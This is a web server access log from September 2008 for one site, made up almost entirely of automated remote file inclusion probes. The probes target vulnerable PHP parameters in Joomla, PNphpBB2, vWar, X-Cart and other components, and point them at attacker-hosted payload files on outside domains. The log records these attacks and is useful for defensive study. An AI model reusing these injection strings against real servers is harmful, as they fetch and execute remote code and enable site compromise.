74.6.22.178 - - [12/Sep/2008:11:12:18 -0700] "GET /logs/access_070722.log HTTP/1.0" 200 78392 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:12:18 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:12:19 -0700] "GET /logs/access_080331.log/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:12:20 -0700] "GET /logs/access_080331.log/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:12:22 -0700] "GET /logs/access_080502.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.4.42 - - [12/Sep/2008:11:12:28 -0700] "GET /logs/index.php?redir=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.4.42 - - [12/Sep/2008:11:12:30 -0700] "GET /index.php?redir=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 200 89179 "-" "libwww-perl/5.811" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:12:31 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://www.ps-mag.com/magazine/2007/10/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:12:31 -0700] "GET /SQuery/lib/gore.php?libpath=http://www.ps-mag.com/magazine/2007/10/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
84.234.16.214 - - [12/Sep/2008:11:12:32 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.joomlalecce.com/andrea/tondo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [12/Sep/2008:11:12:32 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.joomlalecce.com/andrea/tondo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:12:43 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:12:44 -0700] "GET //skin/zero_vote/error.php?dir=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:12:44 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:12:46 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:12:46 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:12:46 -0700] "GET //skin/zero_vote/error.php?dir=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:12:46 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:12:46 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:12:47 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:12:48 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:13:00 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:13:01 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:13:01 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.1.31.67 - - [12/Sep/2008:11:13:03 -0700] "GET /logs//main.php?sayfa=http://www.soaresdacosta.pt/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.1.31.67 - - [12/Sep/2008:11:13:03 -0700] "GET //main.php?sayfa=http://www.soaresdacosta.pt/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:13:10 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:13:10 -0700] "GET /logs/access_080331.log/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:13:11 -0700] "GET /logs/phphtml.php?htmlclass_path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:13:11 -0700] "GET /phphtml.php?htmlclass_path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:13:11 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
200.155.18.50 - - [12/Sep/2008:11:13:16 -0700] "GET /logs/access_080523.log/includes/search.php?GlobalSettings[templatesDirectory]=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:13:16 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:13:18 -0700] "GET /logs/phphtml.php?htmlclass_path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:13:18 -0700] "GET /phphtml.php?htmlclass_path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:13:18 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:11:13:24 -0700] "GET /logs/access_080419.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:11:13:25 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:11:13:25 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:13:28 -0700] "GET /logs/access_080522.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:13:29 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:13:29 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:11:13:29 -0700] "GET /logs/access_080812.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:13:33 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:11:13:35 -0700] "GET /logs/access_080806.log//index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:11:13:37 -0700] "GET //index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 200 89079 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:11:13:38 -0700] "GET /logs//index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:11:13:41 -0700] "GET /logs/access_080806.log//index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:11:13:42 -0700] "GET //index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 200 89063 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:11:13:44 -0700] "GET /logs//index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:13:44 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:13:44 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:13:47 -0700] "GET /logs/access_080502.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:13:48 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:13:49 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.250.238.63 - - [12/Sep/2008:11:13:49 -0700] "GET /index.php?pg=http://goodscanid.thewomanizer.net/rfi.txt?? HTTP/1.1" 200 89114 "-" "libwww-perl/5.813" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:14:00 -0700] "GET /logs/access_080226.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.81.114 - - [12/Sep/2008:11:14:06 -0700] "GET /logs/access_080826.log//include/admin.lib.inc.php?site_path=http://www.geocitie.com/dedi_plg2007/injek/bantai.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:14:12 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://ideaindustry.us/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:14:13 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://ideaindustry.us/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.250.238.63 - - [12/Sep/2008:11:14:17 -0700] "GET /logs/access_080828.log/index.php?pg=http://goodscanid.thewomanizer.net/rfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
209.250.238.63 - - [12/Sep/2008:11:14:17 -0700] "GET /logs/index.php?pg=http://goodscanid.thewomanizer.net/rfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
209.250.238.63 - - [12/Sep/2008:11:14:17 -0700] "GET /index.php?pg=http://goodscanid.thewomanizer.net/rfi.txt?? HTTP/1.1" 200 89114 "-" "libwww-perl/5.813" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:14:19 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.proostjes.be/calendar/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:14:19 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.proostjes.be/calendar/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.51.63.58 - - [12/Sep/2008:11:14:23 -0700] "GET /logs/access_080717.log//home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.58 - - [12/Sep/2008:11:14:23 -0700] "GET //home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.58 - - [12/Sep/2008:11:14:24 -0700] "GET /logs//home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:14:26 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:14:27 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.55.155.50 - - [12/Sep/2008:11:14:33 -0700] "GET /logs/access_080717.log//home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.155.50 - - [12/Sep/2008:11:14:33 -0700] "GET //home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.155.50 - - [12/Sep/2008:11:14:33 -0700] "GET /logs//home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:14:36 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:14:37 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:11:14:39 -0700] "GET /logs/access_080608.log/index.php?option=com_easybook&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:14:40 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:14:43 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:14:43 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:14:44 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
129.142.67.13 - - [12/Sep/2008:11:14:47 -0700] "GET /logs/access_080830.log/index.php?option=com_weblinks&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.58 - - [12/Sep/2008:11:14:50 -0700] "GET /logs/access_080717.log//home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.58 - - [12/Sep/2008:11:14:51 -0700] "GET /logs/access_080806.log//index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.58 - - [12/Sep/2008:11:14:51 -0700] "GET //home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.58 - - [12/Sep/2008:11:14:51 -0700] "GET /logs//home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:14:52 -0700] "GET /logs/customer/product.php?xcart_dir=http://www.travelsin.com//smile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:14:52 -0700] "GET /customer/product.php?xcart_dir=http://www.travelsin.com//smile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:11:14:52 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:14:52 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.51.63.58 - - [12/Sep/2008:11:14:53 -0700] "GET //index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 200 89079 "-" "libwww-perl/5.79" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:14:53 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:14:53 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.51.63.58 - - [12/Sep/2008:11:14:53 -0700] "GET /logs/access_080806.log//index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.58 - - [12/Sep/2008:11:14:54 -0700] "GET /logs//index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.58 - - [12/Sep/2008:11:14:54 -0700] "GET //index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 200 89079 "-" "libwww-perl/5.79" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:11:14:55 -0700] "GET /phphtml.php?htmlclass_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.51.63.58 - - [12/Sep/2008:11:14:56 -0700] "GET /logs//index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.58 - - [12/Sep/2008:11:14:56 -0700] "GET /logs/access_080806.log//index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.0.140.224 - - [12/Sep/2008:11:14:56 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.herbsall.4yz.com/images/1d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.0.140.224 - - [12/Sep/2008:11:14:56 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.herbsall.4yz.com/images/1d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.0.140.224 - - [12/Sep/2008:11:14:56 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.herbsall.4yz.com/images/1d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.51.63.58 - - [12/Sep/2008:11:14:58 -0700] "GET //index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 200 89063 "-" "libwww-perl/5.79" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:14:58 -0700] "GET /provider/auth.php?xcart_dir=http://www.travelsin.com//smile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:14:58 -0700] "GET /logs/provider/auth.php?xcart_dir=http://www.travelsin.com//smile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
211.51.63.58 - - [12/Sep/2008:11:14:59 -0700] "GET /logs//index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:14:59 -0700] "GET /logs/access_080603.log//index.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
12.159.64.135 - - [12/Sep/2008:11:14:59 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.visionsnet.com/links/mylinks/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
12.159.64.135 - - [12/Sep/2008:11:14:59 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.visionsnet.com/links/mylinks/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:15:00 -0700] "GET //index.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 200 89069 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:15:01 -0700] "GET /logs//index.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.0.140.224 - - [12/Sep/2008:11:15:01 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.herbsall.4yz.com/images/1d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:15:02 -0700] "GET /logs/access_080717.log//home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:15:02 -0700] "GET //home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:15:02 -0700] "GET /logs//home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:15:03 -0700] "GET /logs/access_080717.log//home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:15:03 -0700] "GET //home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:15:03 -0700] "GET /logs//home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
